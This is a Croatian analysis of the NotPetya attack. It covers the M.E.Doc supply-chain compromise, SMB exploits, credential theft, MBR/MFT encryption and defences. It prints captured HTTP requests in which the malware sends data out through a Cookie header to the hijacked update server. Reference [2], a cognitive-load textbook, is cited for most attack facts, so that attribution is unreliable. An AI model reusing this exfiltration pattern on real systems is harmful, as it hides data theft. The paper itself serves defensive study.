Analiza napada NotPetya

Napad NotPetya, poznat i pod nazivima PetyaWrap/Petwrap/Nyetya/EternalPetya, započeo je 27. lipnja 2017. godine i najteže pogodio Ukrajinu, nakon čega se proširio i na druge države. Za razliku od klasičnih ransomware napada koji ciljaju zaradu, NotPetya se u praksi ponašao kao destruktivni wiper jer je oporavak podataka često bio nemoguć. Napad je započeo kompromitiranom nadogradnjom ukrajinskog računovodstvenog softvera M.E.Doc (napad na opskrbni lanac), a zatim se vrlo brzo širio unutar organizacija iskorištavanjem SMB ranjivosti (EternalBlue/EternalRomance) i krađom vjerodajnica, uz korištenje legitimnih alata poput PsExec-a i WMIC-a. U radu se opisuje kontekst prethodnih napada na ukrajinski elektroenergetski sektor (2015. i 2016.), ključne faze napada NotPetya, njegove sličnosti i razlike u odnosu na Petya i WannaCry te osnovne mjere zaštite i oporavka.

Ključne riječi: notpetya; petya; petywrap; ransomware; wiper; ukrajina; supply chain attack; m.e.doc; eternalblue; smb; credential theft

Napad NotPetya uzrokovan je zlonamjernim softverom (malware) poznatim i kao Petya / PetyaWrap / Petwrap / Nyetya / EternalPetya, koji je 27. lipnja 2017. pokrenuo val kibernetičkih napada prvenstveno u Ukrajini, a zatim se zaraza proširila i izvan granica zemlje. Napad je izazvao šok na državnoj razini te je, prema prijavama, pogođeno više od 1500 pravnih i fizičkih osoba, uz procjene da je kompromitirano oko 10% računala u zemlji. [1] Na slici 1 prikazan je zaslon prilikom NotPetya napada.

                     Slika 1 Zaslon prilikom NotPetya napada [2]

Ukrajina: [2]

• Nacionalna policija Ukrajine zaprimila je više od 1500 prijava pogođenih subjekata.
• Pogođene žrtve i sustavi uključivali su: Kyivenergo (energetska tvrtka), Ukrtelecom (telekom operater) te sustav za nadzor radijacije Nuklearne elektrane Černobil .
• Na razini sektora prijavljeno je: 4 bolnice u Kijevu, 6 energetskih tvrtki (uključujući Kyivenergo), 2 zračne luke, više od dvadeset i dvije banke te gotovo sve državne agencije.
• Procjenjuje se da je kompromitirano oko 10 % računala u cijeloj zemlji.

Ostatak svijeta: [2]

• Zaraza se iz Ukrajine proširila na dijelove Rusije, Europe i ostatak svijeta.
• Maersk (brodarski logističar) je bio među najpogođenijima te je morao masovno obnavljati IT sustave.
• Merck (farmaceutska kompanija) je prijavio značajne gubitke zbog prekida poslovanja i sanacije sustava.
• FedEx (kurirska logistika) je prijavio veliku štetu, uključujući učinak na svoju dansku podružnicu.
• Saint-Gobain (građevinski materijali) je procijenio snažan negativan financijski utjecaj napada.
• Prema procjenama Bijele kuće, ukupna šteta napada bila je na razini više milijardi dolara.

Kako bi se razumio kontekst napada NotPetya, važno je istaknuti da je Ukrajina već tijekom 2015. i 2016. bila meta niza kibernetičkih napada na gotovo sve sektore, pri čemu se posebno izdvajaju dva velika napada na elektroenergetski sustav:

23. prosinca 2015. izveden je kibernetički napad na ukrajinsku elektroenergetsku mrežu, nakon kojeg je oko 230.000 ljudi ostalo bez električne energije.

Napad je započeo višemjesečnom spearphishing kampanjom i početnom kompromitacijom (npr. dokumenti koji navode žrtvu da omogući sadržaj). Nakon ulaska u sustav, napadači su se kretali po mreži, prikupljali administratorske lozinke i koordinirano isključivali sustave. Uz to su koristili i dodatne metode kako bi otežali oporavak, primjerice rekonfiguraciju UPS uređaja, lažne telefonske pozive (TDoS), brisanje podataka alatom KillDisk i promjene firmwarea kontrolnih uređaja. Napajanje je vraćeno ručnim upravljanjem nakon oko 6 sati, no na nekim lokacijama automatizacija je bila narušena i znatno dulje.

17. prosinca 2016. dogodio se novi napad na energetske tvrtke. Ispad je trajao kraće (oko 1 sat), ali je napad bio tehnički napredniji jer je korišten zlonamjerni softver Industroyer/CrashOverride.

Riječ je o alatu koji je prilagođen industrijskim sustavima: može prepoznati i koristiti industrijske protokole elektroenergetskih uređaja, skenirati mrežu, pronaći ciljeve i aktivirati se u određeno vrijeme, čak i bez stalne komunikacije s C2 poslužiteljem. Zbog modularne građe, sličan pristup može se prilagoditi i za druge elektroenergetske mreže, ne samo u Ukrajini.

Nakon napada na elektroenergetsku mrežu 2015. i 2016., jedno od ključnih pitanja bilo je tko stoji iza njih. Ukrajina je brzo optužila Rusiju (odnosno ruske sigurnosne službe), ali bez javno priloženih konkretnih dokaza, a kasnije je istu stranu optužila i za napad NotPetyom. S vremenom su se tim optužbama pridružile i vlade Ujedinjenog Kraljevstva i SAD-a. ESET je u listopadu 2018. objavio poveznice između napada na ukrajinski energetski sektor i napada NotPetya te naveo indikacije da iza njih stoji ista grupa, poznata kao Sandworm / TeleBots, koja se dovodi u vezu i s drugim napadima na organizacije u Ukrajini. [2] Na slici 2 vizualno su prikazane poveznice između napada na ukrajinsku elektroenergetsku mrežu i napada NotPetyom.

Slika 2 Poveznice između napada na ukrajinsku elektroenergetsku mrežu i napada NotPetyom [2]

Sličnosti s prethodnim ransomwareima vidljive su već kod same Petye. Petya je varijanta ransomwarea prvi put zabilježena 2016. godine. Kao i drugi ransomware, šifrira datoteke i podatke na računalu žrtve te od korisnika traži uplatu u Bitcoinu kako bi (navodno) omogućio dešifriranje. Međutim, za razliku od starijih varijanti koje šifriraju samo pojedine „važne” datoteke, Petya zaključava cijeli tvrdi disk. To postiže šifriranjem Master File Tablea (MFT), čime pristup datotekama na disku postaje nemoguć. Primijećeno je da cilja isključivo Windows računala, a najčešće se širi putem privitaka u elektroničkoj pošti. Napadači su se pritom često predstavljali kao kandidati za posao i slali lažne prijave HR odjelima, dok su priloženi PDF-ovi sadržavali zaraženu Dropbox poveznicu ili su bili izvršne datoteke (npr. .exe) prerušene u dokument. [3]

Kada se 2017. pojavio napad NotPetya, Kaspersky mu je dodijelio takvo ime zbog izraženih sličnosti s Petyom. [5] I napad NotPetya je utjecao na cijeli disk, ali je uz šifriranje MFT-a šifrirao i velik broj datoteka. Posebno je bio opasan zbog načina širenja: širio se naglo i iznimno brzo, zahvaćajući čitave mreže korištenjem različitih exploita ranjivosti, krađom vjerodajnica (credential theft) te metodama lateralnog širenja unutar mreže.

Napad NotPetya se često uspoređuje i s napadom WannaCry , ponajviše zato što je koristio istu ranjivost EternalBlue (CVE-2017-0144) koja je iskorištena i u globalnom WannaCry napadu ranije 2017. godine. Upravo je to omogućilo širenje kroz mrežu bez potrebe za interakcijom korisnika, za razliku od Petye kod koje je infekcija tipično započinjala otvaranjem zlonamjernog privitka. Iako je Microsoft izdao zakrpu za EternalBlue i upute za zaštitu, velik broj organizacija je nije pravovremeno instalirao, što je značajno doprinijelo razmjeru širenja napada.

Za razliku od većine ransomware napada, koji privremeno ograniče pristup datotekama u zamjenu za otkupninu, napad NotPetya u praksi je bio izrazito destruktivan. Često nije postojao realan način da se šteta poništi, pa je oporavak sustava i podataka bio vrlo težak ili nemoguć.

Naziv, poruka o otkupnini na ekranu i sličan „kriptoviralni” profil činili su napad NotPetya naizgled ransomwareom, no ta je taktika vjerojatno služila za prikrivanje stvarne namjere napadača. Poruka je prikazivala lažnu (nefunkcionalnu) bitcoin adresu, pa žrtve u praksi nisu imale smislen način plaćanja otkupnine, odnosno napad NotPetya nije imao financijsku dobit kao primarni cilj. Pravi ransomware napadači u pravilu pokušavaju motivirati žrtvu na plaćanje kako bi dobila podatke natrag, pa im je primarni motiv novac, a ne trajno oštećenje sustava. Kako je napad kasnije potencijalno povezan s ruskom skupinom, zaključuje se da je napad NotPetya vjerojatno imao i političku motivaciju. [3]

Napad NotPetya nije krenuo na klasičan način kao većina zlonamjernih softvera, npr. putem:

• phishing e-poruke,
• lažne web stranice / lažnog ažuriranja,
• iskorištavanja ranjivosti preglednika ili aplikacija,
• napada na računala dostupna s interneta.

Umjesto toga, napad NotPetya bio je napad na opskrbni lanac (engl. supply chain attack). U takvom napadu napadač ne napada krajnju žrtvu izravno, nego:

1. napada proizvođača proizvoda koji krajnja žrtva koristi
2. ugrađuje zlonamjerni kôd u taj softver prije distribucije korisnicima
3. zarazi korisnike tog softvera.

Na slici 3 prikazan je vizualizirani postupak napada na opskrbni lanac.

                           Slika 3 napad na opskrbni lanac [2]

Prve zaraze napada NotPetya povezane su s ukrajinskim računovodstvenim softverom M.E.Doc, koji koristi oko 80 % ukrajinskih tvrtki te je instaliran na oko milijun računala u zemlji. Ukrajinska tvrtka Intellect Service, proizvođač M.E.Doc-a, nije povezana s napadačima, nego je napadnuta kako bi napadači preko njihovog softvera zarazili krajnje žrtve: gotovo sve organizacije u Ukrajini i njihove partnere.

Najzanimljivije svojstvo zlonamjernog kôda ugrađenog u M.E.Doc je da ne koristi klasične C2 (command-and-control) poslužitelje napadača. Umjesto toga, kôd prima naredbe i šalje prikupljene podatke preko službenih, ali kompromitiranih poslužitelja za ažuriranje M.E.Doc-a, na domeni upd.me-doc.com.ua. To znači da komunikacija na mreži izgleda kao uobičajeno ažuriranje programa, pa ju je teško prepoznati kao napad. Gotovo jedina razlika u odnosu na normalan update promet je što zlonamjerni kôd prikupljene informacije skriva u HTTP zaglavlju „Cookie” (cookies) i tako ih potajno šalje poslužitelju. [2]

Na slici 4 vidi se isječak iz Wiresharka (opcija Follow TCP Stream) koji pokazuje kako se zlonamjerni kod “glumi” normalno ažuriranje M.E.Doc-a, ali u stvarnosti potajno šalje podatke napadaču.

Objašnjenje slike:

• Crveno su poruke koje šalje klijent → poslužitelj (zaraženo računalo prema serveru).
• Plavo su poruke koje šalje poslužitelj → klijent.

Ključna stvar je da komunikacija ide prema upd.me-doc.com.ua (izgleda kao legitiman update server), a prikupljeni podaci se skrivaju u HTTP Cookie zaglavlju.

Primjer zahtjeva (izgleda kao obična provjera verzije):

GET /last.ver?rnd=86bd86f07faf4eda879069c57a4dc572 HTTP/1.1
User-Agent: medoc1001189
Host: upd.me-doc.com.ua

Odgovor poslužitelja:

HTTP/1.1 200 OK
Server: nginx/1.2.7
Content-Type: application/octet-stream
Content-Length: 7
Connection: keep-alive
Accept-Ranges: bytes

Najvažniji dio – slanje podataka kroz Cookie:

GET /last.ver?rnd=0e5ae4fbc9904d81987586e496edf281 HTTP/1.1
Cookie: EDRPOU=11112222;; un=Admin
User-Agent: medoc1001189
Host: upd.me-doc.com.ua

U ovom primjeru Cookie sadrži EDRPOU (identifikator organizacije) i un (primjer korisničkog imena). Zbog toga promet izgleda kao normalan HTTP promet prema update serveru, ali se stvarni sadržaj (prikupljeni podaci) skriva u cookiesima, što otežava detekciju.

Slika 4 Komunikacija zlonamjernog kôda s poslužiteljem za ažuriranje softvera M.E. Doc [2]

Zlonamjerni kôd ugrađen u M.E.Doc imao je i dodatne funkcionalnosti koje su napadačima pomagale u odabiru i razumijevanju žrtve. Prikupljao je postavke e-pošte i proxyja, uključujući korisnička imena i lozinke, te je prikupljao i EDRPOU brojeve. EDRPOU je jedinstveni identifikator svake pravne osobe u Ukrajini, pa su napadači na temelju tog broja mogli točno znati koju su organizaciju zarazili i po potrebi prilagoditi daljnji napad. Dio zlonamjernog koda koji prikuplja EDRPOU brojeve prikazan je na slici 5.

          Slika 5 Dio zlonamjernog kôda  koji prikuplja EDRPOU brojeve [2]

Osim toga, kôd je preko službenog (ali kompromitiranog) poslužitelja za ažuriranje primao naredbe koje su bile dodatno skrivene: poruke su bile komprimirane (GZip) i šifrirane (Triple DES). Zbog toga se iz samog mrežnog prometa teško moglo zaključiti što se zapravo prenosi i koja je svrha komunikacije, osim ako se ne poznaje unutarnji način rada kôda.

Sveukupno, kombinacija napada na opskrbni lanac (zlonamjerni kôd je bio ubačen u legitiman softver) i komunikacije preko službenog update kanala učinila je inicijalni napad NotPetye vrlo teško uočljivim i još težim za zaustaviti. [2]

Jednom kada napad NotPetya zarazi jedno ili više računala putem kompromitiranog ažuriranja softvera M.E.Doc, nastavlja se širiti kroz lokalnu mrežu tvrtke na dva načina:

1. iskorištavanjem ranjivosti servisa SMB pomoću exploita EternalBlue i EternalRomance,
2. krađom korisničkih imena i lozinki ili pristupnih tokena te širenjem legitimnim, ugrađenim mehanizmima operacijskog sustava Microsoft Windows.

Prvi način sličan je načinu širenja WannaCry ransomwarea, koji je također koristio exploit EternalBlue. Kao i u slučaju WannaCrya, zakrpa za odgovarajuće ranjivosti bila je dostupna mjesecima prije, pa računala koja su redovito ažurirana nisu bila ranjiva na ovaj način širenja. Nažalost, mnoge organizacije čak ni nakon WannaCry napada nisu ažurirale računala odgovarajućim zakrpama.

Drugi način širenja (krađa i korištenje korisničkih imena i lozinki ili pristupnih tokena) posebno je opasan jer se napad može proširiti i na računala koja nisu ranjiva na exploite EternalBlue i EternalRomance.

Napad NotPetya se za širenje često oslanja na krađu pristupnih podataka. To radi na nekoliko načina:

• čita LSASS memoriju (kao alat Mimikatz) i pokušava izvući spremljena korisnička imena i lozinke,
• uzima vjerodajnice iz Credential Managera (mjesta gdje Windows može čuvati spremljene prijave),
• krade ili kopira access tokene iz drugih procesa, kako bi se mogao predstavljati kao drugi korisnik (npr. administrator) i dobiti pristup bez ponovnog upisivanja lozinke.

Kad napad NotPetya prikupi potrebne pristupne podatke, koristi ih da SMB protokolom prekopira svoju izvršnu datoteku na druga računala u lokalnoj mreži. Nakon toga pokreće tu datoteku uz pomoć jednog od dva legitimna alata: PsExec i WMIC. Alat PsExec pokreće kopiranu datoteku putem SMB protokola, a alat WMIC koristi Windows Management Instrumentation (WMI) kako bi pokrenuo datoteku. Ove metode same po sebi nisu nepoznate (koriste se i u administraciji i u napadima), ali je posebno opasno što ih napad NotPetya koristi automatizirano, bez ručne kontrole napadača.

Napad NotPetya nakon zaraze prvo pretraži disk i počne šifrirati datoteke s određenim nastavcima:

[3]

Osim toga, mijenja i kôd na početku diska, u MBR-u (Master Boot Record). MBR se izvršava prije pokretanja operacijskog sustava, a napad NotPetya ga prepravlja tako da se pri sljedećem paljenju računala pokrene njegov kôd, koji zatim šifrira ključne strukture datotečnog sustava (MFT – Master File Table) i prikaže ucjenjivačku poruku. Zbog toga korisnici često primijete da se računalo ubrzo nakon zaraze samo ponovno pokrene, a nakon restarta ih dočeka zaslon prikazan na slici 6 na kojemu piše da je sustav u procesu „popravka diska”, ali se u pozadini zapravo odvija šifriranje podataka. Kad postupak završi, pojavljuje se ucjenjivačka poruka prikazana na slici 7. Ovakav pristup (izmjena MBR-a i „zaključavanje” diska) neuobičajen je, ali nije potpuno nov jer je slična tehnika viđena i kod ransomwarea Petya.

                         Slika 6 Lažna poruka o popravku diska [2] 

                          Slika 7 Ucjenjivačka poruka [2]

Ključna razlika je što kod napada NotPetya ključ za dešifriranje nije pouzdano pohranjen, što podupire mišljenje da cilj napada nije zarada, nego trajna šteta i uništavanje podataka. Drugim riječima, napad NotPetya se samo površno predstavlja kao ransomware, dok se zapravo ponaša kao wiper. Više o razlici između ransomwarea i wipera može se pročitati na poveznica. Iako su kasnije pronađene određene greške u implementaciji šifriranja zbog kojih je u nekim slučajevima bilo moguće spasiti dio podataka, za mnoge žrtve to je došlo prekasno i nije značajno smanjilo štetu.

Napad NotPetya bio je posebno opasan zbog kombinacije brzog širenja mrežom (SMB exploiti i zloupotreba ukradenih vjerodajnica) te zato što se u praksi ponašao kao wiper. Zbog toga zaštita zahtijeva skup mjera koje pokrivaju prevenciju zaraze, sprječavanje lateralnog širenja i oporavak. [2]

• Redovito instaliranje sigurnosnih zakrpa (patching)

Ažurirati Windows i kritične komponente (Windows Update), posebno zakrpe vezane uz SMB ranjivosti (npr. MS17-010 / EternalBlue).

• Sigurnost e-pošte

Skenirati e-poštu na zlonamjerni sadržaj, ograničiti rizične privitke iz vanjskih izvora te provoditi edukaciju o prepoznavanju sumnjivih poruka i poveznica.

• Endpoint zaštita

Koristiti antivirus/EDR s ažurnim definicijama te uključiti i pravilno podesiti vatrozid na krajnjim uređajima.

• Načelo najmanjih ovlasti

Za svakodnevni rad koristiti standardne korisničke račune, a administrativne ovlasti samo kada su nužne.

• Ograničavanje SMB prometa

Blokirati dolazni SMB gdje nije potreban (TCP 139 i 445) te provesti segmentaciju mreže (npr. VLAN-ovi) radi smanjenja “prelijevanja” zaraze.

• Smanjenje broja računa s visokim ovlastima

Minimizirati broj korisnika s domain administrative ovlastima i odvojiti administrativne račune od računa za svakodnevni rad.

• Kontrola alata za udaljeno izvršavanje

Ograničiti i nadzirati korištenje legitimnih alata koji se mogu zloupotrijebiti (npr. PsExec i WMIC/WMI) te otežati neautorizirano udaljeno pokretanje programa.

U slučaju napada koji uzrokuje trajni gubitak podataka (wiper ponašanje), oporavak uvelike ovisi o kvaliteti sigurnosnih kopija i pripremljenim procedurama.

• Offline sigurnosne kopije (backup)

Izrađivati kopije na zasebne medije ili sustave te ih nakon izrade odspojiti (offline) kako napad ne bi zahvatio i kopije.

• Redovito testiranje povrata (restore test)

Periodično provjeravati može li se sustav i podaci uspješno vratiti iz sigurnosnih kopija.

• Plan postupanja u incidentu

Unaprijed definirati postupke za izolaciju dijelova mreže, obavještavanje i prioritete oporavka kritičnih sustava.

[2],[4]

Napad NotPetya pokazao je da najveću štetu ne moraju uzrokovati klasični ransomware napadi usmjereni na zaradu, nego i kampanje koje se samo „predstavljaju” kao ransomware, a u praksi djeluju destruktivno poput wipera. Ključna posebnost napada bila je početna zaraza kroz kompromitirani opskrbni lanac (nadogradnja M.E.Doc-a), što je napadačima omogućilo brz i širok početni doseg u Ukrajini te otežalo rano otkrivanje. Nakon inicijalne infekcije napad se iznimno učinkovito širio unutar mreža kombinacijom iskorištavanja SMB ranjivosti (EternalBlue/EternalRomance) i krađe vjerodajnica, a zatim i automatiziranom upotrebom legitimnih administracijskih alata (PsExec i WMIC). Posljedice su bile prekidi rada velikog broja organizacija i ogromna novčana šteta, uključujući i kompanije izvan Ukrajine.

Iz prikazanih faza napada može se zaključiti da tehničke mjere zaštite moraju biti višeslojne: redovito zakrpavanje sustava i ograničavanje SMB prometa smanjuju mogućnost širenja exploitima, dok načelo najmanjih ovlasti i nadzor administracijskih alata smanjuju rizik širenja ukradenim vjerodajnicama. Budući da je kod wiper ponašanja oporavak često moguć jedino iz sigurnosnih kopija, offline backup i provjereni postupci povrata podataka ostaju ključni dio obrane. Ukupno gledano, NotPetya je primjer kako napad na opskrbni lanac, uz brzo lateralno širenje i destruktivno djelovanje, može prerasti u incident globalnih razmjera.

[1] CERT.hr. Analiza zlonamjernog softvera NotPetya. [Mrežno]. 2019. [Citirano: 19. siječnja 2026.] https://www.cert.hr/wp-content/uploads/2019/09/analiza_zlonamjernog_softvera_NotPetya.pdf

[2] Plass, Jan L., Moreno, Roxana i Brünken, Roland. Cognitive Load Theory. Cambridge University Press. 2010.

[3] Cloudflare. Petya and NotPetya Ransomware. [Mrežno]. [Citirano: 20. siječnja 2026.] https://www.cloudflare.com/ru-ru/learning/security/ransomware/petya-notpetya-ransomware/

[4] CrowdStrike. PetrWrap Ransomware Technical Analysis: Triple Threat (File Encryption, MFT Encryption, Credential Theft). [Mrežno]. [Citirano: 22. siječnja 2026.] https://www.crowdstrike.com/en-us/blog/petrwrap-ransomware-technical-analysis-triple-threat-file-encryption-mft-encryption-credential-theft/

[5] HKCERT. Petwrap/NotPetya ransomware encrypts victim data. [Mrežno]. [Citirano: 22. siječnja 2026.] https://www.hkcert.org/security-bulletin/petwrap-notpetya-ransomware-encrypts-victim-data

[6] Kaspersky. New Ransomware Epidemics (ExPetr/Petya/NotPetya). [Mrežno]. [Citirano: 22. siječnja 2026.] https://www.kaspersky.com/blog/new-ransomware-epidemics/17314/